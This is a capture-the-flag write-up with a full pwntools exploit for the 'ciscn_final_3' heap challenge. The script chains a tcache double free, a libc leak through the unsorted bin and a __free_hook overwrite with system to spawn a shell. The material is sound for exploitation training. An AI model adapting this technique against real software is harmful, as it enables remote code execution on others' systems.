tcache机制的利用,通过unsorted泄露进而将堆空间开辟到libc中,写__free_hook拿到shell…
exp
from pwn import *
context.log_level = 'debug'
def pause_debug():
log.info(proc.pidof(p))
pause()
def add(idx, size, content):
p.sendlineafter('choice >', str(1))
p.sendlineafter('index', str(idx))
p.sendlineafter('size', str(size))
p.sendafter('something', content)
def remove(idx):
p.sendlineafter('choice >', str(2))
p.sendlineafter('index', str(idx))
proc_name = './ciscn_final_3'
p = process(proc_name)
# p = remote('node3.buuoj.cn', 25285)
elf = ELF(proc_name)
libc = ELF('./libc-2.27.so')
add(0, 0x78, b'a') # get heap addr (chunk 0)
p.recvuntil('gift :')
chunk0 = int(p.recv(14), 16)
heap_base = chunk0 - 0x11e70
log.info(hex(heap_base))
add(1, 0x18, b'a')
add(2, 0x78, b'a')
add(3, 0x78, b'a')
add(4, 0x78, b'a')
add(5, 0x78, b'a')
add(6, 0x78, b'a')
add(7, 0x78, b'a')
add(8, 0x78, b'a')
add(9, 0x78, b'a')
add(10, 0x78, b'a')
remove(10)
remove(10)
add(11, 0x78, p64(chunk0 - 0x10))
add(12, 0x78, p64(chunk0 - 0x10))
add(13, 0x78, p64(0) + p64(0x4a1)) # fake_chunk
remove(0)
remove(1) # into unsorted bin
add(14, 0x78, b'a')
add(14, 0x78, b'a')
add(15, 0x18, b'a')
add(16, 0x18, b'a') # main_arena
# pause_debug()
p.recvuntil('gift :')
libc_base = int(p.recv(14), 16) - 0x3ebca0
log.info(hex(libc_base))
# write __free_hook
add(17, 0x68, b'a')
remove(17)
remove(17)
free_hook_addr = libc_base + libc.sym['__free_hook']
system_addr = libc_base + libc.sym['system']
add(18, 0x68, p64(free_hook_addr))
add(19, 0x68, b'/bin/sh\x00')
add(20, 0x68, p64(system_addr))
remove(19)
p.interactive()